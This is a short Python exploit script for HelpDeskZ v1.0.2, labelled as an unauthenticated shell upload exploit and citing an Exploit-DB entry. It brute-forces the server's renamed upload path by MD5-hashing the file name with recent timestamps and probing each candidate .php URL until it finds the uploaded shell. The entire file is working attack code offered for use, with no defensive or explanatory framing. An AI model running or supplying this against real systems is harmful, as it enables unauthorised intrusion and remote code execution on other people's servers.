#!/usr/bin/python3

#REF: https://www.exploit-db.com/exploits/40300

import hashlib
import time
import sys
import requests

print("Helpdeskz v1.0.2 - Unauthenticated shell upload exploit")

if len(sys.argv) < 3:
    print("Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0]))
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]

currentTime = int(time.time())

for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)

    md5hash = hashlib.md5(plaintext.encode('utf-8')).hexdigest()
    
    url = helpdeskzBaseUrl + md5hash + '.php'
    
    response = requests.head(url)
    if response.status_code == 200:
        print("found!")
        print(url)
        sys.exit(0)

print("Sorry, I did not find anything")